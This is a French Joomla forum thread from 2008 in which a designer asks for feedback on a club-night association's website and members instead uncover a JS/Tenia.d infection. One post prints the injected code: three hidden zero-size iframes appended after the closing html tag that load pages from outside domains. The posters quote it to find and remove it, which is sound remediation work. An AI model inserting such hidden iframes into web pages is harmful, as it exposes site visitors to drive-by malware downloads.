DiablessClubbing, Organisateurs de soirées contre les discriminations

Réduire
X
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • [Nouveau] DiablessClubbing, Organisateurs de soirées contre les discriminations

    Bonjour,
    • Description :
      Voici un de mes sites, DiablessClubbing. Cette association lutte contre les discriminations (homophobie) en organisant des soirées afin de réunir les communautés (homo/hétéro/bi).

      Je précise que le site est maintenant entre les mains du client et que certaines choses n'ont pas été livrées comme tel (ex : taille de police d'écriture sur page d'accueil et page réservations)
    • Adresse du site : www.diablessclubbing.com Virus supprimé
    • Version de Joomla utilisée : Joomla! 1.0.10 Stable
    • Template utilisé : Surface de Yootheme
    • Extensions utilisées : datso gallery, acajoom, facileforms, opensef, akocomment
    • Hébergeur : OVH 90 plan


    Que pensez-vous du design ? de l'organisation du contenu ? quelles sont vos impressions sur le site ?
    Dernière édition par web86 à 11/07/2008, 11h13
    Les Chambres d'hôtes du Paly - Made by MIW, tutoriaux joomla et ressources web 2.0

  • #2
    Mefiance !

    VIRUS

    Hallucination peut etre ? voyez ceci avant de cliquer sur son lien ou mettez des bretelles !

    http://tmp.glog.fr/diable.jpg
    http//www.monptitloup.com

    Commentaire


    • #3
      Aucunes craintes ...

      Je ne sais pas quel est ton antivirus mais mes clients n'ont aucuns problèmes de virus quand on va sur leur site et moi non plus.
      J'ai Kaspersky, et il ne m'a jamais rien détecté.
      Les Chambres d'hôtes du Paly - Made by MIW, tutoriaux joomla et ressources web 2.0

      Commentaire


      • #4
        Cheval de troie

        JS/tenia.d

        Avec Internet Explorer v7

        antivirus: Viruscan Entreprise V 8.50i Patch 6


        En effet Firefox et Safari ne le lèvent pas.

        Ça mérite approfondissement je crois .
        http//www.monptitloup.com

        Commentaire


        • #5
          c'est sur ça mérite approfondissement...

          mais personne, à part toi, ne m'a fait part de ce problème, bizarre...
          Les Chambres d'hôtes du Paly - Made by MIW, tutoriaux joomla et ressources web 2.0

          Commentaire


          • #6
            Voila ce que dit Mc Afee: http://vil.nai.com/vil/content/v_146254.htm

            En esperant que ca pourra t'aider. Salut.


            JS/Tenia.dType Trojan SubType Script Discovery Date 06/25/2008 Length Varies Minimum DAT 5325 (06/25/2008) Updated DAT 5325 (06/25/2008) Minimum Engine 5.1.00 Description Added 06/25/2008 Description Modified 06/26/2008 11:19 PM (PT) Type Type of threat.
            SubType Additional type information.
            Discovery Date Date that AVERT discovered this threat.
            Length File size, in bytes, of the threat.
            Minimum DAT McAfee DAT files contain detection and repair information for threats. The Minimum DAT field specifies the lowest/oldest DAT version that is capable of detecting the first incarnation of a threat, and the release date. The highest/newest DAT version should always be used for the most complete protection and are available on the Anti-Virus Updates page.

            Each description displays the minimum, fully tested, DAT version that includes regular detection for a particular threat. These fully tested DATs are released on a daily basis. If necessary, they are also released when a Medium, Medium On Watch, or High risk threat is discovered. An EXTRA.DAT will also be posted for these more prevalent threats, if necessary.

            For each description listed, detection is always available. In the event that the DAT version specified is not yet available, an EXTRA.DAT file may be downloaded via the McAfee AVERT Extra.dat Request Page. Alternatively, minimally tested HOURLY BETA DAT files are available for downloading.
            Updated DAT McAfee DAT files are constantly being updated to enhance detection capabilities. The Updated DAT field specifies the released DAT version that contains the most up to date detection.
            Minimum Engine The scan engine uses the DAT files to detect threats. The Minimum Engine field specifies the lowest/oldest engine version that is capable of detecting this threat. The highest/newest engine version should always be used for the most complete protection and are available on the Anti-Virus Updates page.
            Description Added Date/time this description was published using Pacific Time.
            Description Modified Date/time this description was last modified using Pacific Time.
            Risk Assessment
            Corporate User Low
            Home User Low Tab Navigation
            Overview Characteristics Symptoms Method of Infection Removal Variants All Information Overview
            This is a trojan detection. Unlike viruses, trojans do not self-replicate. They are spread manually, often under the premise that they are beneficial or wanted. The most common installation methods involve system or security exploitation, and unsuspecting users manually executing unknown programs. Distribution channels include email, malicious or hacked web pages, Internet Relay Chat (IRC), peer-to-peer networks, etc.
            Characteristics

            This detection covers scripts in which malicious iFrame(s) is appended to the end of a HTML page, i.e. after the < /HTML > tag.

            The recent variant also included Javascript obfuscated malicious iFrames. These iFrames will lead to redirection of the browser window to browser exploits that will download and execute malware on user's computer.



            Symptoms

            Unexpected network connections to unknown websites
            Method of Infection

            Browsing of websites containing scripts as previously described.


            Removal
            AVERT recommends to always use latest DATs and engine. This threat will be cleaned if you have this combination.

            Additional Windows ME/XP removal considerations


            Variants
            Variants
            N/A

            All Information
            Overview -
            This is a trojan detection. Unlike viruses, trojans do not self-replicate. They are spread manually, often under the premise that they are beneficial or wanted. The most common installation methods involve system or security exploitation, and unsuspecting users manually executing unknown programs. Distribution channels include email, malicious or hacked web pages, Internet Relay Chat (IRC), peer-to-peer networks, etc.

            Characteristics
            Characteristics -

            This detection covers scripts in which malicious iFrame(s) is appended to the end of a HTML page, i.e. after the < /HTML > tag.

            The recent variant also included Javascript obfuscated malicious iFrames. These iFrames will lead to redirection of the browser window to browser exploits that will download and execute malware on user's computer.



            Symptoms
            Symptoms -

            Unexpected network connections to unknown websites
            Method of Infection
            Method of Infection -

            Browsing of websites containing scripts as previously described.


            Removal -
            Removal -
            AVERT recommends to always use latest DATs and engine. This threat will be cleaned if you have this combination.

            Additional Windows ME/XP removal considerations
            http//www.monptitloup.com

            Commentaire


            • #7
              Envoyé par web86 Voir le message
              c'est sur ça mérite approfondissement...

              mais personne, à part toi, ne m'a fait part de ce problème, bizarre...
              Bonjour,

              Mauvaise nouvelle, on est deux, je constate également ce problème sur ton site, ainsi que sur le mien .... http://www.csb.free.fr , depuis ce matin, sans avoir réalisé de modifications depuis quelques temps, hormis l'ajout d'articles...
              Peut-être que le pb existe depuis quelques temps et que les définitions de virus ont été mises à jour depuis hier.

              Mon anti-virus : McAfee V8, virus définition 5335 et Scan engine 5200
              Site réalisé avec Joomla! 1.0.13 Stable

              Me voilà en quête de savoir comment supprimer ce cheval de troie que je reçois chaque fois que je clique sur un lien de mon site. L'anti-virus le détecte et le nettoie à chaque fois, mais la solution est de trouver comment l'erradiquer du serveur qui dans mon cas est chez free.

              Si quelqu'un a une idée.... merci d'avance
              Jean-Pierre

              Commentaire


              • #8
                Sur tous les postes desquels j'ai pu tester mon site (et le tien) aucun problème n'apparait...
                (2 postes ont kaspersky comme antivirus et rien à signaler)

                Mon site est très visité, notamment à la suite de soirées (ce qui est le cas en ce moment) et mes clients me contactent dès qu'il y a un problème, or pour l'instant rien. S'il avait constaté ce problème ils m'auraient déjà appelé...

                bizarre...
                Dernière édition par web86 à 10/07/2008, 13h46
                Les Chambres d'hôtes du Paly - Made by MIW, tutoriaux joomla et ressources web 2.0

                Commentaire


                • #9
                  Quelques précisions sur mes investigations

                  Sur le même PC, donc avec le même anti-virus, une alerte virus monte avec IE6 et pas avec Mozilla !
                  Je confirme donc ce qui disait dgills, même si je n'y croyais pas, ça dépend du navigateur (au moins en partie).

                  Ceci m'a donc permis de comparer le code source des 2 pages, et il se trouve qu'après la balise < / h t m l > il y a vait le code suivant :

                  <iframe src="http://pinoc.info/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://pinoc.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>[/
                  La position de ce code, ajouté par rapport au fichier d'origine correspond à la description faite sur le site de McAfee.

                  Après suppression de ce code sur la page index.php du serveur, tout est rentré dans l'ordre.

                  J'ai aussi constaté que le site http://pinoc.... était classifié "malicious site" par le programme servant à limiter les accès web sur mon lieu de travail. Il y a surement relation de cause à effet !

                  Ceci n'explique pas pourquoi rien ne se passe avec Mozilla ....

                  Je reste persuadé que quelque chose n'est pas sein. As tu un code semblalble sur tes fichiers ?
                  Jean-Pierre

                  Commentaire


                  • #10
                    Bien vu .

                    Ok Jean-pierre , j'ai visité ton site et tout semble rentré dans l'ordre.

                    http//www.monptitloup.com

                    Commentaire


                    • #11
                      Envoyé par jean-pierre Voir le message
                      Sur le même PC, donc avec le même anti-virus, une alerte virus monte avec IE6 et pas avec Mozilla !
                      Je confirme donc ce qui disait dgills, même si je n'y croyais pas, ça dépend du navigateur (au moins en partie).

                      Ceci m'a donc permis de comparer le code source des 2 pages, et il se trouve qu'après la balise < / h t m l > il y a vait le code suivant :



                      La position de ce code, ajouté par rapport au fichier d'origine correspond à la description faite sur le site de McAfee.

                      Après suppression de ce code sur la page index.php du serveur, tout est rentré dans l'ordre.

                      J'ai aussi constaté que le site http://pinoc.... était classifié "malicious site" par le programme servant à limiter les accès web sur mon lieu de travail. Il y a surement relation de cause à effet !

                      Ceci n'explique pas pourquoi rien ne se passe avec Mozilla ....

                      Je reste persuadé que quelque chose n'est pas sein. As tu un code semblalble sur tes fichiers ?

                      j'avais exactement le même code que toi !
                      virus potentiel supprimé !

                      puis-je avoir les avis sur mon site maintenant ?
                      Les Chambres d'hôtes du Paly - Made by MIW, tutoriaux joomla et ressources web 2.0

                      Commentaire


                      • #12
                        Sentiment d'innachevé

                        Sentiment d'innachevé parceque je n'ai pas tout compris à ce qui s'est passé. J'ai ouvert une discussion dans le forum Sécurité, mais pas de réponses pour l'instant...

                        Sinon pour ton site je trouve le design très bien (hormis effectivement cette police de caractère un peu grande sur la page d'accueil.

                        Par contre côté contenu, ... je n'ai pas bien compris l'intérêt du site. Il y a eu une soirée, il y a des commentaires de gens qui disent qu'ils ont passé une bonne soirée (j'ai pas tout lu )... Bien, mais comment l'association s'approche de son objectif ? S'il n'y a que des soirées organisées, suivie de commentaires de participants ....

                        Le lien "Le concorde atlantique" ne marche pas.

                        Voilà
                        Jean-Pierre

                        Commentaire


                        • #13
                          Le site à pour but de faire un compte rendu des soirées (photos, commentaires), informer sur le contenu des soirées (dj, lieu, prix) et permet de réserver des entrées pour les soirées.

                          L'objectif est atteint par le fait même que les soirées rassemblent du monde et que cela se passe bien.

                          ok pour le lien je vais voir ça
                          Les Chambres d'hôtes du Paly - Made by MIW, tutoriaux joomla et ressources web 2.0

                          Commentaire


                          • #14
                            Tout est en ordre .

                            ok web86

                            http//www.monptitloup.com

                            Commentaire

                            Annonce

                            Réduire
                            1 sur 2 < >

                            C'est [Réglé] et on n'en parle plus ?

                            A quoi ça sert ?
                            La mention [Réglé] permet aux visiteurs d'identifier rapidement les messages qui ont trouvé une solution.

                            Merci donc d'utiliser cette fonctionnalité afin de faciliter la navigation et la recherche d'informations de tous sur le forum.

                            Si vous deviez oublier de porter cette mention, nous nous permettrons de le faire à votre place... mais seulement une fois
                            Comment ajouter la mention [Réglé] à votre discussion ?
                            1 - Aller sur votre discussion et éditer votre premier message :


                            2 - Cliquer sur la liste déroulante Préfixe.

                            3 - Choisir le préfixe [Réglé].


                            4 - Et voilà… votre discussion est désormais identifiée comme réglée.

                            2 sur 2 < >

                            Assistance au forum - Outil de publication d'infos de votre site

                            Compatibilité: PHP 4.1,PHP4, 5, 6DEV MySQL 3.2 - 5.5 MySQLi from 4.1 ( @ >=PHP 4.4.9)

                            Support Version de Joomla! : | J!3.0 | J!2.5.xx | J!1.7.xx | J!1.6.xx | J1.5.xx | J!1.0.xx |

                            Version française (FR) D'autres versions sont disponibles depuis la version originale de FPA

                            UTILISER À VOS PROPRES RISQUES :
                            L'exactitude et l'exhaustivité de ce script ainsi que la documentation ne sont pas garanties et aucune responsabilité ne sera acceptée pour tout dommage, questions ou confusion provoquée par l'utilisation de ce script.

                            Problèmes connus :
                            FPA n'est actuellement pas compatible avec des sites Joomla qui ont eu leur fichier configuration.php déplacé en dehors du répertoire public_html.

                            Installation :

                            1. Téléchargez l'archive souhaitée : http://afuj.github.io/FPA/

                            Archive zip : https://github.com/AFUJ/FPA/zipball/master

                            2. Décompressez le fichier de package téléchargé sur votre propre ordinateur (à l'aide de WinZip ou d'un outil de décompression natif).

                            3. Lisez le fichier LISEZMOI inclus pour toutes les notes de versions spécifiques.

                            4. LIRE le fichier de documentation inclus pour obtenir des instructions d'utilisation détaillées.

                            5. Téléchargez le script fpa-fr.php à la racine de votre site Joomla!. C'est l'endroit que vous avez installé Joomla et ce n'est pas la racine principale de votre serveur. Voir les exemples ci-dessous.

                            6. Exécutez le script via votre navigateur en tapant: http:// www. votresite .com/ fpa-fr.php
                            et remplacer www. votresite .com par votre nom de domaine


                            Exemples:
                            Joomla! est installé dans votre répertoire web et vous avez installé la version française du fichier FPA:
                            Télécharger le script fpa-fr.php dans: /public_html/
                            Pour executer le script: http://www..com/fpa-fr.php

                            Joomla! est installé dans un sous-répertoire nommé "cms" et vous avez installé la version française du fichier FPA:
                            Télécharger le script fpa-fr.php dans: /public_html/cms/
                            Pour executer le script: http://www..com/cms/fpa-fr.php

                            En raison de la nature très sensible de l'information affichée par le script FPA, il doit être retiré immédiatement du serveur après son utilisation.

                            Pour supprimer le script de votre site, utilisez le lien de script de suppression fourni en haut de la page du script. Si le lien de suppression échoue pour supprimer le script, utilisez votre programme FTP pour le supprimer manuellement ou changer le nom une fois que le script a généré les données du site et le message publié sur le forum. Si le script est toujours présent sur le site, il peut être utilisé pour recueillir suffisamment d'informations pour pirater votre site. Le retrait du script empêche des étrangers de l'utiliser pour jeter un oeil à la façon dont votre site est structuré et de détecter les défauts qui peuvent être utilisé à vos dépends.
                            Voir plus
                            Voir moins
                            Travaille ...
                            X